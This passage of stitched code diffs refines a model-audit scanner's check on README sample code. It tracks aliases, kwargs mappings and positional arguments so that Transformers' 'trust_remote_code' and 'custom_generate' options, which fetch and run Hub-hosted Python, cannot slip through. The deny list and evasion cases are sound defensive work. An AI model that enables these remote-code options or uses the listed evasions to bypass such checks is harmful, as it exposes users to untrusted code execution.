-        if not prior_bindings or id(prior_bindings[-1]) not in proven_mapping_binding_chains:
+        if not proven_mapping_binding_precedes_call(mapping_value.id, transfer_call):
             continue
         candidate_transfer_call_ids = frozenset(
             proven_mapping_transfer_call_id_set | {id(candidate) for candidate in transfer_calls}
@@ -2862,6 +3026,53 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
     proven_mapping_call_ids = frozenset(proven_mapping_call_id_set)
     proven_mapping_transfer_call_ids = frozenset(proven_mapping_transfer_call_id_set)
 
+    remote_mapping_calls_by_name: dict[str, list[ast.Call]] = {}
+    for node in nodes:
+        if (
+            not isinstance(node, ast.Call)
+            or not isinstance(node.func, ast.Attribute)
+            or node.func.attr not in {"from_pretrained", "generate"}
+        ):
+            continue
+        for keyword in node.keywords:
+            if keyword.arg is None and isinstance(keyword.value, ast.Name):
+                remote_mapping_calls_by_name.setdefault(keyword.value.id, []).append(node)
+    remote_mapping_alias_names = set(remote_mapping_calls_by_name)
+    pending_remote_mapping_alias_names = list(remote_mapping_alias_names)
+    remaining_remote_alias_steps = _MAX_README_IMAGE_EXAMPLE_AST_NODES
+    while pending_remote_mapping_alias_names:
+        mapping_name = pending_remote_mapping_alias_names.pop()
+        for _binding_node, first_name, second_name in mapping_aliases:
+            if remaining_remote_alias_steps <= 0:
+                return False
+            remaining_remote_alias_steps -= 1
+            if mapping_name not in {first_name, second_name}:
+                continue
+            alias_name = second_name if mapping_name == first_name else first_name
+            if alias_name in remote_mapping_alias_names:
+                continue
+            remote_mapping_alias_names.add(alias_name)
+            pending_remote_mapping_alias_names.append(alias_name)
+    allowed_mapping_alias_subscript_names = mapping_alias_target_names & remote_mapping_alias_names
+
+    def is_allowed_mapping_subscript_target(target: ast.expr) -> bool:
+        if not isinstance(target, ast.Subscript) or not isinstance(target.value, ast.Name):
+            return False
+        mapping_calls = remote_mapping_calls_by_name.get(target.value.id, [])
+        if mapping_calls and all(
+            is_direct_expression_call(mapping_call) and operation_definitely_follows_reference(target, mapping_call)
+            for mapping_call in mapping_calls
+        ):
+            return True
+        if target.value.id not in allowed_mapping_alias_subscript_names:
+            return False
+        prior_bindings = [
+            binding_value
+            for binding_node, binding_value in single_name_bindings.get(target.value.id, [])
+            if operation_definitely_follows_reference(target, binding_node)
+        ]
+        return bool(prior_bindings) and isinstance(prior_bindings[-1], ast.Dict)
+
     for node in nodes:
         if isinstance(node, ast.Import):
             for alias in node.names:
@@ -2891,7 +3102,10 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
             return False
         if isinstance(node, (ast.Assign, ast.AnnAssign, ast.AugAssign)):
             targets = node.targets if isinstance(node, ast.Assign) else [node.target]
-            if any(not isinstance(target, ast.Name) for target in targets):
+            if any(
+                not isinstance(target, ast.Name) and not is_allowed_mapping_subscript_target(target)
+                for target in targets
+            ):
                 return False
         if (
             isinstance(node, ast.Name)

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -2033,6 +2033,64 @@ def _matching_readme_image_fence_end(
 
 # Transformers keywords that cause Hub-hosted Python to be fetched and executed.
 _REMOTE_CODE_KEYWORDS = frozenset({"custom_generate", "trust_remote_code"})
+_GENERATE_CUSTOM_IMPLEMENTATION_POSITIONS = (10, 11)
+
+
+def _remote_code_option_is_disabled(name: str, value: ast.expr) -> bool:
+    if not isinstance(value, ast.Constant):
+        return False
+    if name == "trust_remote_code":
+        return value.value is False
+    if name == "custom_generate":
+        return value.value is None
+    return True
+
+
+def _remote_code_mapping_is_proven_safe(
+    value: ast.expr,
+    *,
+    bindings: dict[str, list[tuple[int, ast.expr]]],
+    binding_counts: Counter[str],
+    unsafe_names: frozenset[str],
+    call_lineno: int,
+    resolving: frozenset[str] = frozenset(),
+) -> bool:
+    if isinstance(value, ast.Name):
+        if value.id in resolving or value.id in unsafe_names or binding_counts[value.id] != 1:
+            return False
+        candidates = bindings.get(value.id, [])
+        if len(candidates) != 1:
+            return False
+        binding_lineno, binding_value = candidates[0]
+        if binding_lineno >= call_lineno:
+            return False
+        return _remote_code_mapping_is_proven_safe(
+            binding_value,
+            bindings=bindings,
+            binding_counts=binding_counts,
+            unsafe_names=unsafe_names,
+            call_lineno=call_lineno,
+            resolving=resolving | {value.id},
+        )
+    if not isinstance(value, ast.Dict):
+        return False
+    for key, item_value in zip(value.keys, value.values, strict=True):
+        if key is None:
+            if not _remote_code_mapping_is_proven_safe(
+                item_value,
+                bindings=bindings,
+                binding_counts=binding_counts,
+                unsafe_names=unsafe_names,
+                call_lineno=call_lineno,
+                resolving=resolving,
+            ):
+                return False
+            continue
+        if not isinstance(key, ast.Constant) or not isinstance(key.value, str):
+            return False
+        if key.value in _REMOTE_CODE_KEYWORDS and not _remote_code_option_is_disabled(key.value, item_value):
+            return False
+    return True
 
 
 def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
@@ -2177,12 +2235,22 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
         "tolist",
     }
     allowed_targets: set[int] = set()
+    mapping_bindings: dict[str, list[tuple[ast.AST, ast.expr]]] = {}
+    mapping_aliases: list[tuple[ast.AST, str, str]] = []
+    name_binding_nodes: dict[str, list[ast.AST]] = {}
+    for node in nodes:
+        if isinstance(node, ast.Name) and isinstance(node.ctx, ast.Store):
+            name_binding_nodes.setdefault(node.id, []).append(node)
+        elif isinstance(node, ast.arg):
+            name_binding_nodes.setdefault(node.arg, []).append(node)
     assignments: dict[str, list[tuple[int, str | None]]] = {}
     for statement in tree.body:
         if not isinstance(statement, (ast.Assign, ast.AnnAssign)):
             continue
         targets = statement.targets if isinstance(statement, ast.Assign) else [statement.target]
         for target in targets:
+            if isinstance(target, ast.Name) and statement.value is not None:
+                mapping_bindings.setdefault(target.id, []).append((statement, statement.value))
             if isinstance(target, ast.Name) and target.id in protected_names and target.id != "requests":
                 if isinstance(statement, ast.AnnAssign) and not isinstance(statement.value, ast.Constant):
                     continue
@@ -2191,6 +2259,110 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
                 assignments.setdefault(target.id, []).append(
                     (statement.lineno, value if isinstance(value, str) else None)
                 )
+    for binding_node in nodes:
+        if not isinstance(binding_node, (ast.Assign, ast.AnnAssign)):
+            continue
+        targets = binding_node.targets if isinstance(binding_node, ast.Assign) else [binding_node.target]
+        identity_names = [target.id for target in targets if isinstance(target, ast.Name)]
+        if isinstance(binding_node.value, ast.Name):
+            identity_names.append(binding_node.value.id)
+        if identity_names:
+            root_name = identity_names[0]
+            for alias_name in identity_names[1:]:
+                if alias_name == root_name:
+                    continue
+                mapping_aliases.append((binding_node, root_name, alias_name))
+
+    def is_proven_mapping_use(node: ast.Name) -> bool:
+        parent = parents.get(id(node))
+        if isinstance(parent, ast.keyword):
+            return parent.arg is None and parent.value is node
+        if isinstance(parent, ast.Dict):
+            return any(
+                key is None and item_value is node for key, item_value in zip(parent.keys, parent.values, strict=True)
+            )
+        if isinstance(parent, ast.Assign):
+            return parent.value is node and all(isinstance(target, ast.Name) for target in parent.targets)
+        return isinstance(parent, ast.AnnAssign) and parent.value is node and isinstance(parent.target, ast.Name)
+
+    aliased_mapping_names = set(mapping_bindings)
+    for _binding_node, first_name, second_name in mapping_aliases:
+        aliased_mapping_names.update((first_name, second_name))
+    unsafe_mapping_loads = [
+        node
+        for node in nodes
+        if isinstance(node, ast.Name)
+        and isinstance(node.ctx, ast.Load)
+        and node.id in aliased_mapping_names
+        and not is_proven_mapping_use(node)
+    ]
+    top_level_statement_indices = {
+        id(descendant): statement_index
+        for statement_index, statement in enumerate(tree.body)
+        for descendant in ast.walk(statement)
+    }
+
+    def call_execution_may_be_deferred(call: ast.Call) -> bool:
+        current: ast.AST = call
+        while parent := parents.get(id(current)):
+            if isinstance(parent, ast.GeneratorExp):
+                return True
+            if isinstance(parent, ast.Lambda) and current is parent.body:
+                return True
+            if isinstance(parent, (ast.FunctionDef, ast.AsyncFunctionDef)) and any(
+                current is statement for statement in parent.body
+            ):
+                return True
+            current = parent
+        return False
+
+    def mapping_operation_may_affect_call(operation: ast.AST, call: ast.Call) -> bool:
+        if call_execution_may_be_deferred(call):
+            return True
+        if getattr(operation, "lineno", None) == call.lineno:
+            return True
+        operation_index = top_level_statement_indices.get(id(operation))
+        call_index = top_level_statement_indices.get(id(call))
+        return operation_index is None or call_index is None or operation_index <= call_index
+
+    def remote_code_mapping_is_proven_safe_at_call(value: ast.expr, call: ast.Call) -> bool:
+        relevant_bindings = {
+            name: [
+                (getattr(binding_node, "lineno", 0), binding_value)
+                for binding_node, binding_value in candidates
+                if mapping_operation_may_affect_call(binding_node, call)
+            ]
+            for name, candidates in mapping_bindings.items()
+        }
+        relevant_binding_counts: Counter[str] = Counter(
+            {
+                name: sum(mapping_operation_may_affect_call(binding_node, call) for binding_node in binding_nodes)
+                for name, binding_nodes in name_binding_nodes.items()
+            }
+        )
+        relevant_aliases: dict[str, set[str]] = {}
+        for binding_node, first_name, second_name in mapping_aliases:
+            if not mapping_operation_may_affect_call(binding_node, call):
+                continue
+            relevant_aliases.setdefault(first_name, set()).add(second_name)
+            relevant_aliases.setdefault(second_name, set()).add(first_name)
+        unsafe_names = {node.id for node in unsafe_mapping_loads if mapping_operation_may_affect_call(node, call)}
+        pending_unsafe_names = list(unsafe_names)
+        while pending_unsafe_names:
+            unsafe_name = pending_unsafe_names.pop()
+            for alias_name in relevant_aliases.get(unsafe_name, set()):
+                if alias_name in unsafe_names:
+                    continue
+                unsafe_names.add(alias_name)
+                pending_unsafe_names.append(alias_name)
+        return _remote_code_mapping_is_proven_safe(
+            value,
+            bindings=relevant_bindings,
+            binding_counts=relevant_binding_counts,
+            unsafe_names=frozenset(unsafe_names),
+            call_lineno=call.lineno,
+        )
+
     for node in nodes:
         if isinstance(node, ast.Import):
             for alias in node.names:
@@ -2255,37 +2427,29 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
         if isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute):
             if node not in requests_calls and node.func.attr not in documented_attribute_calls:
                 return False
-            # `trust_remote_code` and `custom_generate` both cause Transformers to fetch and execute
-            # Hub-hosted Python, and neither is exclusive to `from_pretrained`: since Transformers
-            # 4.55 `generate(custom_generate=..., trust_remote_code=True)` does it too, and
-            # `generate` is a documented call. Gate them on every call, not just `from_pretrained`.
             if any(
-                (
-                    keyword.arg == "trust_remote_code"
-                    and (not isinstance(keyword.value, ast.Constant) or keyword.value.value is not False)
-                )
-                or keyword.arg == "custom_generate"
+                keyword.arg in _REMOTE_CODE_KEYWORDS and not _remote_code_option_is_disabled(keyword.arg, keyword.value)
                 for keyword in node.keywords
             ):
                 return False
-            # `**kwargs` hides the arguments above from inspection. Reject it outright only on
-            # `from_pretrained`; documented cards legitimately write `model.generate(**inputs)`, so
-            # for every other call reject just the literal-dict form that names a remote-code flag.
-            if any(
-                keyword.arg is None
-                and (
-                    node.func.attr == "from_pretrained"
-                    or (
-                        isinstance(keyword.value, ast.Dict)
-                        and any(
-                            isinstance(key, ast.Constant) and key.value in _REMOTE_CODE_KEYWORDS
-                            for key in keyword.value.keys
-                        )
-                    )
+            if node.func.attr == "generate":
+                if any(isinstance(argument, ast.Starred) for argument in node.args):
+                    return False
+                for custom_generate_position in _GENERATE_CUSTOM_IMPLEMENTATION_POSITIONS:
+                    if len(node.args) > custom_generate_position and not _remote_code_option_is_disabled(
+                        "custom_generate",
+                        node.args[custom_generate_position],
+                    ):
+                        return False
+            for keyword in node.keywords:
+                if keyword.arg is not None:
+                    continue
+                requires_proof = node.func.attr in {"from_pretrained", "generate"} or isinstance(
+                    keyword.value,
+                    ast.Dict,
                 )
-                for keyword in node.keywords
-            ):
-                return False
+                if requires_proof and not remote_code_mapping_is_proven_safe_at_call(keyword.value, node):
+                    return False
             attribute_root = node.func.value
             while isinstance(attribute_root, (ast.Attribute, ast.Subscript, ast.Call)):
                 if isinstance(attribute_root, ast.Call) and attribute_root in requests_calls:

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -2052,7 +2052,8 @@ def _remote_code_mapping_is_proven_safe(
     bindings: dict[str, list[tuple[int, ast.expr]]],
     binding_counts: Counter[str],
     unsafe_names: frozenset[str],
-    call_lineno: int,
+    proven_mapping_call_ids: frozenset[int],
+    call_position: int,
     resolving: frozenset[str] = frozenset(),
 ) -> bool:
     if isinstance(value, ast.Name):
@@ -2061,17 +2062,20 @@ def _remote_code_mapping_is_proven_safe(
         candidates = bindings.get(value.id, [])
         if len(candidates) != 1:
             return False
-        binding_lineno, binding_value = candidates[0]
-        if binding_lineno >= call_lineno:
+        binding_position, binding_value = candidates[0]
+        if binding_position >= call_position:
             return False
         return _remote_code_mapping_is_proven_safe(
             binding_value,
             bindings=bindings,
             binding_counts=binding_counts,
             unsafe_names=unsafe_names,
-            call_lineno=call_lineno,
+            proven_mapping_call_ids=proven_mapping_call_ids,
+            call_position=call_position,
             resolving=resolving | {value.id},
         )
+    if isinstance(value, ast.Call):
+        return id(value) in proven_mapping_call_ids
     if not isinstance(value, ast.Dict):
         return False
     for key, item_value in zip(value.keys, value.values, strict=True):
@@ -2081,7 +2085,8 @@ def _remote_code_mapping_is_proven_safe(
                 bindings=bindings,
                 binding_counts=binding_counts,
                 unsafe_names=unsafe_names,
-                call_lineno=call_lineno,
+                proven_mapping_call_ids=proven_mapping_call_ids,
+                call_position=call_position,
                 resolving=resolving,
             ):
                 return False
@@ -2156,6 +2161,8 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
     }
     documented_builtin_names = {"enumerate", "len", "print", "range", "round", "zip"}
     imported_names = {"requests"}
+    transformers_factory_names: set[str] = set()
+    transformers_mapping_factory_names: set[str] = set()
     for node in nodes:
         if isinstance(node, ast.Import):
             for alias in node.names:
@@ -2174,6 +2181,10 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
                 ):
                     return False
                 imported_names.add(alias.name)
+                if node.module == "transformers":
+                    transformers_factory_names.add(alias.name)
+                    if alias.name.endswith(("Processor", "Tokenizer", "TokenizerFast", "FeatureExtractor")):
+                        transformers_mapping_factory_names.add(alias.name)
     known_names = (
         imported_names
         | documented_builtin_names
@@ -2237,12 +2248,14 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
     allowed_targets: set[int] = set()
     mapping_bindings: dict[str, list[tuple[ast.AST, ast.expr]]] = {}
     mapping_aliases: list[tuple[ast.AST, str, str]] = []
-    name_binding_nodes: dict[str, list[ast.AST]] = {}
+    name_write_nodes: dict[str, list[ast.AST]] = {}
     for node in nodes:
-        if isinstance(node, ast.Name) and isinstance(node.ctx, ast.Store):
-            name_binding_nodes.setdefault(node.id, []).append(node)
+        if isinstance(node, ast.Name) and isinstance(node.ctx, (ast.Store, ast.Del)):
+            name_write_nodes.setdefault(node.id, []).append(node)
         elif isinstance(node, ast.arg):
-            name_binding_nodes.setdefault(node.arg, []).append(node)
+            name_write_nodes.setdefault(node.arg, []).append(node)
+        elif isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef)):
+            name_write_nodes.setdefault(node.name, []).append(node)
     assignments: dict[str, list[tuple[int, str | None]]] = {}
     for statement in tree.body:
         if not isinstance(statement, (ast.Assign, ast.AnnAssign)):
@@ -2273,8 +2286,198 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
                     continue
                 mapping_aliases.append((binding_node, root_name, alias_name))
 
+    top_level_statement_indices = {
+        id(descendant): statement_index
+        for statement_index, statement in enumerate(tree.body)
+        for descendant in ast.walk(statement)
+    }
+
+    def top_level_statement_precedes(candidate: ast.AST, reference: ast.AST) -> bool:
+        candidate_index = top_level_statement_indices.get(id(candidate))
+        reference_index = top_level_statement_indices.get(id(reference))
+        return candidate_index is not None and reference_index is not None and candidate_index < reference_index
+
+    def is_single_name_binding(binding: ast.AST | None, value: ast.expr, expected_name: str | None = None) -> bool:
+        if isinstance(binding, ast.Assign):
+            if binding.value is not value or len(binding.targets) != 1:
+                return False
+            target = binding.targets[0]
+        elif isinstance(binding, ast.AnnAssign):
+            if binding.value is not value:
+                return False
+            target = binding.target
+        else:
+            return False
+        return isinstance(target, ast.Name) and (expected_name is None or target.id == expected_name)
+
+    def call_has_only_explicit_safe_mapping_arguments(value: ast.Call) -> bool:
+        return (
+            not any(isinstance(argument, ast.Starred) for argument in value.args)
+            and not any(keyword.arg is None for keyword in value.keywords)
+            and not any(
+                keyword.arg in _REMOTE_CODE_KEYWORDS and not _remote_code_option_is_disabled(keyword.arg, keyword.value)
+                for keyword in value.keywords
+            )
+        )
+
+    def trusted_transformers_instance_is_proven_safe(
+        instance_name: str,
+        binding_node: ast.AST,
+        allowed_factory_names: set[str],
+    ) -> bool:
+        instance_bindings = [
+            (instance_binding, factory_call)
+            for instance_binding, factory_call in mapping_bindings.get(instance_name, [])
+            if top_level_statement_precedes(instance_binding, binding_node)
+        ]
+        prior_write_count = sum(
+            top_level_statement_precedes(write_node, binding_node)
+            for write_node in name_write_nodes.get(instance_name, [])
+        )
+        if len(instance_bindings) != 1 or prior_write_count != 1:
+            return False
+        instance_binding, factory_call = instance_bindings[0]
+        return (
+            isinstance(factory_call, ast.Call)
+            and call_has_only_explicit_safe_mapping_arguments(factory_call)
+            and is_single_name_binding(instance_binding, factory_call, instance_name)
+            and isinstance(factory_call.func, ast.Attribute)
+            and factory_call.func.attr == "from_pretrained"
+            and isinstance(factory_call.func.value, ast.Name)
+            and factory_call.func.value.id in allowed_factory_names
+        )
+
+    def is_allowed_local_device(value: ast.expr) -> bool:
+        if not isinstance(value, ast.Constant) or not isinstance(value.value, str):
+            return False
+        device = value.value
+        return device in {"cpu", "cuda", "mps"} or (
+            device.startswith("cuda:") and device.removeprefix("cuda:").isdecimal()
+        )
+
+    def mapping_device_is_proven_safe(value: ast.expr, binding_node: ast.AST) -> bool:
+        if is_allowed_local_device(value):
+            return True
+        if isinstance(value, ast.Attribute) and value.attr == "device" and isinstance(value.value, ast.Name):
+            return trusted_transformers_instance_is_proven_safe(
+                value.value.id,
+                binding_node,
+                transformers_factory_names,
+            )
+        if not isinstance(value, ast.Name):
+            return False
+        device_bindings = [
+            (device_binding, device_value)
+            for device_binding, device_value in mapping_bindings.get(value.id, [])
+            if top_level_statement_precedes(device_binding, binding_node)
+        ]
+        prior_write_count = sum(
+            top_level_statement_precedes(write_node, binding_node) for write_node in name_write_nodes.get(value.id, [])
+        )
+        if len(device_bindings) != 1 or prior_write_count != 1:
+            return False
+        device_binding, device_value = device_bindings[0]
+        return is_single_name_binding(device_binding, device_value, value.id) and is_allowed_local_device(device_value)
+
+    def unwrap_safe_mapping_device_transfers(
+        value: ast.expr,
+        binding_node: ast.AST,
+    ) -> tuple[ast.expr, tuple[ast.Call, ...]] | None:
+        transfers: list[ast.Call] = []
+        mapping_value = value
+        while (
+            isinstance(mapping_value, ast.Call)
+            and isinstance(mapping_value.func, ast.Attribute)
+            and mapping_value.func.attr == "to"
+        ):
+            if (
+                len(mapping_value.args) != 1
+                or mapping_value.keywords
+                or not mapping_device_is_proven_safe(mapping_value.args[0], binding_node)
+            ):
+                return None
+            transfers.append(mapping_value)
+            mapping_value = mapping_value.func.value
+        return mapping_value, tuple(transfers)
+
+    def name_writes_match_binding_chain(write_nodes: list[ast.AST], binding_chain: tuple[int, ...]) -> bool:
+        write_indices = [top_level_statement_indices.get(id(write_node)) for write_node in write_nodes]
+        binding_indices = [top_level_statement_indices.get(binding_id) for binding_id in binding_chain]
+        return (
+            None not in write_indices
+            and None not in binding_indices
+            and Counter(write_indices) == Counter(binding_indices)
+        )
+
+    def trusted_mapping_factory_call_is_proven_safe(binding_node: ast.AST, mapping_value: ast.expr) -> bool:
+        if (
+            not isinstance(mapping_value, ast.Call)
+            or not isinstance(mapping_value.func, ast.Name)
+            or not call_has_only_explicit_safe_mapping_arguments(mapping_value)
+        ):
+            return False
+        return trusted_transformers_instance_is_proven_safe(
+            mapping_value.func.id,
+            binding_node,
+            transformers_mapping_factory_names,
+        )
+
+    proven_mapping_call_id_set: set[int] = set()
+    proven_mapping_transfer_call_ids: set[int] = set()
+    proven_mapping_binding_chains: dict[int, tuple[int, ...]] = {}
+    ordered_mapping_bindings = sorted(
+        (
+            (binding_node, binding_name, binding_value)
+            for binding_name, candidates in mapping_bindings.items()
+            for binding_node, binding_value in candidates
+        ),
+        key=lambda item: top_level_statement_indices.get(id(item[0]), len(tree.body)),
+    )
+    for binding_node, binding_name, binding_value in ordered_mapping_bindings:
+        if not isinstance(binding_value, ast.Call) or not is_single_name_binding(
+            binding_node,
+            binding_value,
+            binding_name,
+        ):
+            continue
+        unwrapped_mapping = unwrap_safe_mapping_device_transfers(binding_value, binding_node)
+        if unwrapped_mapping is None:
+            continue
+        mapping_value, transfer_calls = unwrapped_mapping
+        binding_chain: tuple[int, ...] | None = None
+        if trusted_mapping_factory_call_is_proven_safe(binding_node, mapping_value):
+            binding_chain = (id(binding_node),)
+        elif transfer_calls and isinstance(mapping_value, ast.Name) and mapping_value.id == binding_name:
+            prior_bindings = [
+                prior_binding
+                for prior_binding, _prior_value in mapping_bindings.get(binding_name, [])
+                if top_level_statement_precedes(prior_binding, binding_node)
+            ]
+            if prior_bindings:
+                prior_chain = proven_mapping_binding_chains.get(id(prior_bindings[-1]))
+                prior_writes = [
+                    write_node
+                    for write_node in name_write_nodes.get(binding_name, [])
+                    if top_level_statement_precedes(write_node, binding_node)
+                ]
+                if (
+                    prior_chain is not None
+                    and tuple(id(prior_binding) for prior_binding in prior_bindings) == prior_chain
+                    and name_writes_match_binding_chain(prior_writes, prior_chain)
+                ):
+                    binding_chain = (*prior_chain, id(binding_node))
+        if binding_chain is None:
+            continue
+        proven_mapping_binding_chains[id(binding_node)] = binding_chain
+        proven_mapping_call_id_set.add(id(binding_value))
+        proven_mapping_transfer_call_ids.update(id(transfer_call) for transfer_call in transfer_calls)
+    proven_mapping_call_ids = frozenset(proven_mapping_call_id_set)
+
     def is_proven_mapping_use(node: ast.Name) -> bool:
         parent = parents.get(id(node))
+        if isinstance(parent, ast.Attribute) and parent.value is node and parent.attr == "to":
+            transfer_call = parents.get(id(parent))
+            return isinstance(transfer_call, ast.Call) and id(transfer_call) in proven_mapping_transfer_call_ids
         if isinstance(parent, ast.keyword):
             return parent.arg is None and parent.value is node
         if isinstance(parent, ast.Dict):
@@ -2288,19 +2491,21 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
     aliased_mapping_names = set(mapping_bindings)
     for _binding_node, first_name, second_name in mapping_aliases:
         aliased_mapping_names.update((first_name, second_name))
-    unsafe_mapping_loads = [
-        node
+    unsafe_mapping_operations: list[tuple[str, ast.AST]] = [
+        (node.id, node)
         for node in nodes
         if isinstance(node, ast.Name)
         and isinstance(node.ctx, ast.Load)
         and node.id in aliased_mapping_names
         and not is_proven_mapping_use(node)
     ]
-    top_level_statement_indices = {
-        id(descendant): statement_index
-        for statement_index, statement in enumerate(tree.body)
-        for descendant in ast.walk(statement)
-    }
+    unsafe_mapping_operations.extend(
+        (node.target.id, node)
+        for node in nodes
+        if isinstance(node, ast.AugAssign)
+        and isinstance(node.target, ast.Name)
+        and node.target.id in aliased_mapping_names
+    )
 
     def call_execution_may_be_deferred(call: ast.Call) -> bool:
         current: ast.AST = call
@@ -2326,27 +2531,48 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
         return operation_index is None or call_index is None or operation_index <= call_index
 
     def remote_code_mapping_is_proven_safe_at_call(value: ast.expr, call: ast.Call) -> bool:
-        relevant_bindings = {
+        relevant_binding_nodes = {
             name: [
-                (getattr(binding_node, "lineno", 0), binding_value)
+                (binding_node, binding_value)
                 for binding_node, binding_value in candidates
                 if mapping_operation_may_affect_call(binding_node, call)
             ]
             for name, candidates in mapping_bindings.items()
         }
-        relevant_binding_counts: Counter[str] = Counter(
-            {
-                name: sum(mapping_operation_may_affect_call(binding_node, call) for binding_node in binding_nodes)
-                for name, binding_nodes in name_binding_nodes.items()
-            }
-        )
+        relevant_name_writes = {
+            name: [write_node for write_node in write_nodes if mapping_operation_may_affect_call(write_node, call)]
+            for name, write_nodes in name_write_nodes.items()
+        }
+        relevant_bindings: dict[str, list[tuple[int, ast.expr]]] = {}
+        relevant_binding_counts: Counter[str] = Counter()
+        for name, candidates in relevant_binding_nodes.items():
+            logical_candidates = candidates
+            logical_write_count = len(relevant_name_writes.get(name, []))
+            if candidates:
+                binding_chain = proven_mapping_binding_chains.get(id(candidates[-1][0]))
+                if (
+                    binding_chain is not None
+                    and tuple(id(binding_node) for binding_node, _binding_value in candidates) == binding_chain
+                    and name_writes_match_binding_chain(relevant_name_writes.get(name, []), binding_chain)
+                ):
+                    logical_candidates = [candidates[-1]]
+                    logical_write_count = 1
+            relevant_bindings[name] = [
+                (top_level_statement_indices[id(binding_node)], binding_value)
+                for binding_node, binding_value in logical_candidates
+            ]
+            relevant_binding_counts[name] = logical_write_count
+        for name, write_nodes in relevant_name_writes.items():
+            relevant_binding_counts.setdefault(name, len(write_nodes))
         relevant_aliases: dict[str, set[str]] = {}
         for binding_node, first_name, second_name in mapping_aliases:
             if not mapping_operation_may_affect_call(binding_node, call):
                 continue
             relevant_aliases.setdefault(first_name, set()).add(second_name)
             relevant_aliases.setdefault(second_name, set()).add(first_name)
-        unsafe_names = {node.id for node in unsafe_mapping_loads if mapping_operation_may_affect_call(node, call)}
+        unsafe_names = {
+            name for name, operation in unsafe_mapping_operations if mapping_operation_may_affect_call(operation, call)
+        }
         pending_unsafe_names = list(unsafe_names)
         while pending_unsafe_names:
             unsafe_name = pending_unsafe_names.pop()
@@ -2355,12 +2581,14 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
                     continue
                 unsafe_names.add(alias_name)
                 pending_unsafe_names.append(alias_name)
+
         return _remote_code_mapping_is_proven_safe(
             value,
             bindings=relevant_bindings,
             binding_counts=relevant_binding_counts,
             unsafe_names=frozenset(unsafe_names),
-            call_lineno=call.lineno,
+            proven_mapping_call_ids=proven_mapping_call_ids,
+            call_position=top_level_statement_indices[id(call)],
         )
 
     for node in nodes:

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -2768,6 +2768,47 @@ def _is_valid_official_readme_sample_image_example(
             return False
         return False
 
+    static_mapping_proof_cache: dict[int, bool] = {}
+
+    def static_mapping_expression_is_proven_safe(value: ast.expr) -> bool:
+        value_id = id(value)
+        if value_id in static_mapping_proof_cache:
+            return static_mapping_proof_cache[value_id]
+        if not proof_budget.consume(sum(1 for _node in ast.walk(value))):
+            return False
+        result = _remote_code_mapping_is_proven_safe(
+            value,
+            bindings={},
+            binding_counts=Counter(),
+            unsafe_names=frozenset(),
+            proven_mapping_call_ids=frozenset(),
+            call_position=0,
+        )
+        static_mapping_proof_cache[value_id] = result
+        return result
+
+    proven_safe_mapping_augassign_ids: set[int] = set()
+    proven_safe_mapping_augassign_target_ids: set[int] = set()
+    for node in nodes:
+        if (
+            not isinstance(node, ast.AugAssign)
+            or not isinstance(node.op, ast.BitOr)
+            or not isinstance(node.target, ast.Name)
+            or node.target.id not in mapping_bindings
+            or node.target.id in mapping_alias_target_names
+        ):
+            continue
+        base_bindings = mapping_bindings.get(node.target.id, [])
+        if (
+            len(base_bindings) != 1
+            or not operation_definitely_follows_reference(node, base_bindings[0][0])
+            or not static_mapping_expression_is_proven_safe(base_bindings[0][1])
+            or not static_mapping_expression_is_proven_safe(node.value)
+        ):
+            continue
+        proven_safe_mapping_augassign_ids.add(id(node))
+        proven_safe_mapping_augassign_target_ids.add(id(node.target))
+
     mapping_alias_targets = {
         id(binding_node): frozenset(target_names) for binding_node, target_names, _source_name in mapping_alias_groups
     }
@@ -2795,6 +2836,8 @@ def _is_valid_official_readme_sample_image_example(
             for write_node in name_write_nodes.get(current_name, []):
                 if node_is_within(write_node, reference) or node_is_within(write_node, binding_node):
                     continue
+                if id(write_node) in proven_safe_mapping_augassign_target_ids:
+                    continue
                 if (
                     operation_definitely_follows_reference(
                         write_node,
@@ -2816,6 +2859,8 @@ def _is_valid_official_readme_sample_image_example(
         for endpoint_name in (first_name, second_name):
             for write_node in name_write_nodes.get(endpoint_name, []):
                 if node_is_within(write_node, binding_node):
+                    continue
+                if id(write_node) in proven_safe_mapping_augassign_target_ids:
                     continue
                 if reference_is_post_binding and node_is_within(write_node, reference):
                     return None
@@ -2848,6 +2893,8 @@ def _is_valid_official_readme_sample_image_example(
         for endpoint_name in (first_name, second_name):
             for write_node in name_write_nodes.get(endpoint_name, []):
                 if node_is_within(write_node, binding_node):
+                    continue
+                if id(write_node) in proven_safe_mapping_augassign_target_ids:
                     continue
                 if (
                     operation_definitely_follows_reference(
@@ -2952,6 +2999,7 @@ def _is_valid_official_readme_sample_image_example(
             if isinstance(node, ast.AugAssign)
             and isinstance(node.target, ast.Name)
             and node.target.id in aliased_mapping_names
+            and id(node) not in proven_safe_mapping_augassign_ids
         )
         return operations
 
@@ -2983,11 +3031,16 @@ def _is_valid_official_readme_sample_image_example(
         call_position = top_level_statement_indices[id(call)]
         for name, candidates in relevant_binding_nodes.items():
             logical_candidates = candidates
-            logical_write_count = len(relevant_name_writes.get(name, []))
+            logical_write_nodes = [
+                write_node
+                for write_node in relevant_name_writes.get(name, [])
+                if id(write_node) not in proven_safe_mapping_augassign_target_ids
+            ]
+            logical_write_count = len(logical_write_nodes)
             exhaustive_branch_join = exhaustive_mapping_branch_bindings_precede_call(
                 name,
                 candidates,
-                relevant_name_writes.get(name, []),
+                logical_write_nodes,
                 call,
             )
             if candidates:
@@ -2997,7 +3050,7 @@ def _is_valid_official_readme_sample_image_example(
                 elif (
